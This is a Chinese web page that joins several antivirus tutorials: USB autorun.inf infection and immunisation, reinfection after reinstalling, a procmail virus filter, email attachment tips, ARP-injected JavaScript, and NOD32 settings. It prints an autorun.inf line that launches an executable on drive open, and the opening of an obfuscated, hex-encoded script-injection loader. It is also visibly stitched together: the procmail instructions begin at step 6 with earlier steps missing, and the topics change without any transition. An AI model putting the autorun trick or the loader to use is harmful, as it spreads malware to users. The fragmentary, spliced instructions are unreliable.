下面是小编给各位读者分享的只需这几招:拒绝重复感染病毒服务器教程(共含5篇),欢迎大家分享。同时,但愿您也能像本文投稿人“chestnut”一样,积极向本站投稿分享好文章。
最近在论坛上不断看到有网友求助
磁盘分区不能双击打开;
插入U盘导致感染病毒;
中了病毒后明明完全重装了系统(指格式化系统盘后重装 或者是ghost恢复 下同),但是病毒依然横行,本文将教你导致这些现象的原因,对应的防守策略及解决方法。
首先说说磁盘双击不能打开的原理吧
我们来做个实验,将一个可执行文件放在某个分区的根部录下。例子中是打字练习这个软件。然后我们打开记事本 然后输入
[autorun]
PEN=打字软件.exe pen=输入你的可执行文件的文件名
然后把它保存为名为Autorun.inf文件 也放在该分区的根目录下 如图1
图1 例子
接下来重启电脑,然后双击该分区,原本是要进入该分区的,但是却执行了你的可执行文件。在盘符上单击右键可以看到多了一个自动播放,如果该可执行文件是个病毒的话,那后果就是。
这就是磁盘分区不能双击打开;插入U盘导致感染病毒的原理。
可以看出Autorun.inf文件就是这类病毒的加载途径
有些网友会问 “我看不到有这个病毒呀” 那是因为病毒作者给该文件赋了隐藏属性。
接着网友又会问 “我也选择了显示所有文件呀” 病毒作者为了达到隐藏的目的,修改了注册表中显示隐藏文件的相关选项,使得你即使选择了显示所有文件,也无法达到显示隐藏文件的目的。这里作者提供了相关的修复显示隐藏文件的注册表修复文件供大家下载,点击下载,你下载并运行了该文件后就可以看到被隐藏的Autorun.inf文件了。
知道了原理,我们来防范此类病毒。
首选方法:组策略法 (该方法适用于xp专业版用户,xp家庭版用户跳过)
具体操作方法 开始→运行→输入gpedit.msc→确定→计算机机配置→管理模板→系统关闭自动播放→已启用→所有驱动器→确定 如图2
图2
这样做以后就不怕病毒通过Autorun.inf 自动播放这个功能来加载了。
第二种方法
在每个分区(U盘)的根目录下建立一个名为Autorun.inf的文件夹 是文件夹而不是文件哦,
这样做有个缺点 就是容易被病毒删除。于是我们可以利用文件名特性来在Autorun.inf的文件夹再建立建立一个不易删除的文件夹。
开始-程序-附件-命令提示符 输入 双引号里边的“md x:\autorun.inf\正常的免疫文件..\” 在实际中需把x替换成对应分区的盘符。
中了病毒明明完全重装了系统,但是病毒依然横行。那又是什么原因呢?
原因可能有
第一种情况
就是以上说的,虽然你完全重装了系统,但是其它分区的根目录下的Autorun.inf类病毒还没清除,所以你一双击进入其它分区,即导致重新感染病毒。
解决方法:完全重装系统后先不要进入其它分区,右键单击我的电脑→选搜索→选择所有文件和文件夹→再选择更多高级选项→勾选搜索隐藏文件和文件夹→文件名里填入Autorun.inf→然后按搜索→然后打开任意位于分区根目录下的Autorun.inf 并记录OPEN=xxx.exe 这个文件名→接下来回到搜索窗口→删除所有任意位于分区根目录下的Autorun.inf文件。
接着搜索刚刚记录的xxx.exe(文件名根据实际情况不同)的文件→删除所有任意位于分区根目录下的这些文件。
接着用上边所说的免疫方法为自己的系统做个防范吧
第二种情况
就是你所中的病毒会感染可执行文件和网页文件。有许多网友喜欢把常用软件的安装程序放在硬盘里,以方便重装系统后或者需要时能即时安装使用。
完全重装系统后第一时间就是安装或直接使用那些常用软件(比如杀毒软件,比如QQ),由于安装程序(可执行程序)已被感染,所以造成病毒重新被激活。
防范方法:为防止安装程序受到病毒感染,可以用压缩文件进行压缩打包,这样做既避免了这些程序感染病毒,又节约了磁盘空间。
解决方法:完全重装系统后,先不要安装或运行原硬盘里的任何程序,可以用光盘或U盘从别人的电脑里拷贝杀毒软件的安装程序过来→安装杀毒软件并升级到最新病毒库→然后用杀毒软件全盘查杀病毒。记住清除病毒过程中需要选择的是清除病毒,而不是删除病毒。清除病毒是指把病毒从正常程序里清除出去,而删除会直接把你的程序也一并删除了。
第三种情况
完全重装系统后由于你的系统没有打上安全补丁,一联网便遭到蠕虫类病毒的自动感染。
防范方法:1.安装并升级杀毒软件并它的开启实时监控后再联网(升级杀毒软件用离线升级包)2.使用超级兔子升级天使为你的系统离线打上补丁后再联网。
6、确定档案权限
以下为引用的内容:
touch /var/log/procmail.log <--档案不存在时才touch
chmod 644 /var/log/procmail.log
touch /var/spool/mail/quarantine <--档案不存在时才touch
chmod 644 /var/spool/mail/quarantine
touch /var/log/scores <--档案不存在时才touch
chmod 644 /var/log/scores
7、修改procmailrc
以下为引用的内容:
vi /etc/procmailrc
范例文件如下:
MAILDIR=/var/mail
VERBOSE=off
PATH=“/usr/bin:$PATH:/usr/local/bin”
#Nimda Virus
:0 Bh
* ^Content-Type: audio/x-wav;
* name=“readme.exe”
/dev/null
SHELL=/bin/sh
POISONED_EXECUTABLES=/etc/procmail/poisoned-files
#寄信通知系统管理者,若需更多人请在postmaster后加逗点再输入email即可
SECURITY_NOTIFY=“postmaster”
#系统通知讯息发布人
SECURITY_NOTIFY_VERBOSE=“postmaster”
#寄信通知寄件人
SECURITY_NOTIFY_SENDER=YES
#寄信通知寄件人讯息内容
SECURITY_NOTIFY_SENDER=“/etc/procmail/policy.txt”
#寄信通知给收件人的讯息内容
SECURITY_NOTIFY_RECIPIENT=“/etc/procmail/quarantined.txt”
#可放20字长度以下字符随机数值,增加安全性
SECRET=“sfd9734965q34o2ldgbl”
#检疫隔离信件文件位置
SECURITY_QUARANTINE=/var/spool/mail/quarantine
#宏病毒扫描积分门坎,一般而言,中毒信件得分通常都会超过100分
POISONED_SCORE=100
#宏病毒扫描日志文件位置
SCORE_HISTORY=/var/log/scores
LOGFILE=/var/log/procmail.log
INCLUDERC=/etc/procmail/html-trap.procmail
电子邮件对上网的人而言,是如此的难以离弃,但是,病毒,这个可恨的家伙,披上Email的外衣后,如此猖獗,令我们对可爱的Email不禁有了一丝疑虑:她是否仍然可爱依旧呢?现在笔者就来告诉大家,其实我们可以这样来分辨我们的Email的,
第一招:软件帮忙
选择一款可靠的防毒软件。要对付邮件病毒,在邮件接收过程中对邮件进行扫描过滤是非常有效的手段。我们可以借杀毒软件中的邮件监视功能来实现,比如“KV3000杀毒王”中的网络监视引擎,设置了邮件监视功能,可以在接收邮件过程中对邮件进行处理,有效防止邮件病毒的侵入。
第二招:投石问路
当遇到带有附件的邮件时,如果附件为可执行文件(.exe、.com)或word文档时,不要选择打开,可以用两种方法来检测是否带有病毒,
一种方法是,利用杀毒软件的邮件病毒监视功能来过滤掉邮件中可能存在的病毒。另一种方法是,把附件先另存在硬盘上,然后利用杀毒软件查毒。
第三招:禁止预览
不使用邮件软件邮箱中的预览功能。当今,一些传播与破坏力比较大的病毒,往往都是在邮件预览时进行感染的,并不需要打开邮件。如果使用Outlook收发邮件,建议用户关掉邮箱工具的预览项,或者升级微软的最新补丁,这样可以预防Outlook接收邮件时受到感染。如果使用的是Foxmail,在当前账户属性中模快项选择纯文本格式。
总之,如果掌握防范病毒的一些小技巧,会大大减小邮件病毒或者其它病毒对计算机的破坏。
网页 入如下的arp病毒的js恶意代码
script.>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\...
首先确定你的服务器上原文件 是否有这些代码
就是说 服务器上文件是没有的 但客户端一运行 在客户端看源代码就有了
这样的话 服务器确实中了arp了 只需要在服务器上装一个简单的arp防火墙即可 360 金山的就行 重启服务器 立刻没有了
如果你服务器上的源文件都被修改了 那是你的程序 或 服务器本身有安全漏洞,
如何清理网站被arp病毒插入js恶意代码?服务器教程
,
把你的源码拿回来看下有没有被修改如果有就是你的程序问题
如果没有就可能是arp了.
在网络发展的今天,病毒木马、流氓软件与时俱进,当然反病毒的杀毒软件也不甘示弱的追赶,但是毕竟曾伴用户征战沙场多年,很多国产杀软的面孔以及清除套路,让 熟悉的不能再熟悉了。所以为了能更有效的绝杀病毒木马,下面笔者将会为大家介绍一款强悍的国外杀毒工具——ESET NOD32。
小提示:ESET NOD32 是一款来自美国的杀毒软件,在2006年世界顶级杀毒软件排名中位列第5,其杀软特点能针对已知及未知的病毒,间谍软件(SPYWARE)及其它对用户系统带来威胁的程式进行实时保护。并且与其同行软件相比NOD32占用资源少、侦测速度快,以及准确度高,正是ESET NOD32杀毒软件的最大优势。
一、启动ESET NOD32实时监控
首先从网上下载ESET NOD32软件(下载地址www.crsky.com/soft/4329.html),然后将其解压安装到本地计算机后,与其他同类杀毒软件一样,重新启动即可使用。打开 ESET NOD32控制中心,展开“安全威胁保护模块”选项,选择“AMON(文件实时监控)”选项,然后勾选上右侧“启动文件实时监控(AMON)”复选框,这样就可对系统开启实时监控的功能。单击下面“设置”按钮,打开“AMON设定”对话框,默认切入的是“侦测”标签,从中勾选上执行扫描于栏内的“开启、执行、新建”复选框,这样当系统做以上操作时,其软件就会自动进行监控扫描。为了防止存储设备和网络传输病毒,请在其媒介栏内将里面的相关项勾选上即可。操作完毕后,选择“选项”选项卡,在这里请务必勾选上“智能侦测模式、有潜在的危险程序、高级智能侦测模式”选项,这样才能开启ESET NOD32杀软的启发式扫描,从而能在发现威胁前,对其攻击进行很好的防护。另外“操作”选项卡里,还可以设置在发现病毒后的处理操作,例如选择“自动清除”单选框,这样当其软件发现有病毒出现时,就会将它立即清除掉,绝不给其病毒一丝可乘之机,
二、网络防护很重要
除以上防护检测本机病毒、木马外,ESET NOD32杀毒软件还具有防范来自网络攻击的功能,比如垃圾邮件、网页木马、病毒等攻击,它都能通通帮你化解掉。这里顺“原路”返回到“控制中心”面板,展开“安全威胁保护模块”选项,然后按照同上的方法,分别开启“电子邮件”、“网络监视”的保护装置,而后其软件就会自动监测用户在网络的操作,从而能够阻止病毒和木马感染到系统。
如果你还想对网络通讯监视的更严密一些,请在“网络监视”面板内,单击“设置”按钮,此时就会打开“IMON设定”对话框,默认选择“POP3”标签,从中勾选上“启动电子邮件检查”复选框,这样以后你收发邮件时,ESET NOD32杀毒软件就会自动帮你检测一下,里面的邮件是否安全,然后会在邮件中给出相关的提示信息。另外对网络数据的检查,请选择“HTTP”标签,而后在其页面内勾选“启动Http检查”复选框,这样系统内端口通讯的数据就会自动被NOD32杀毒软件监视中,来判断收发网络数据的安全性,并能及时阻止恶意数据的侵入。另外在下方“兼容度设定”栏内,点击“设定”按钮,还可以查看到目前杀毒软件已检测的网络连接程序,通过此能有效防止外界木马对系统的破坏。默认情况下,对监听程序的设定为高兼容度,如果想增强对其木马的防御能力,可以在其程度的“高兼容度”上方,点击左键即可变更为“高效能”的绿色名称,然后单击“确定”按钮,使以上设置生效。最后如果你想对系统全面扫描,只要在“控制中心”面板里,选择“NOD(手动扫描)”标签, 点击右侧“深入分析”选项,即可对其系统全面杀毒。
后记:ESET NOD32的确是一款非常不错的杀毒软件,而且资源占用情况也是我用的软件中最好的一款,只要打开监控,不进行任何设置,其实可以对系统里的程序进行监控,比如MSN、迅雷之类的网络软件。当然不开监控只是个人的使用习惯,大家可不要轻易效仿!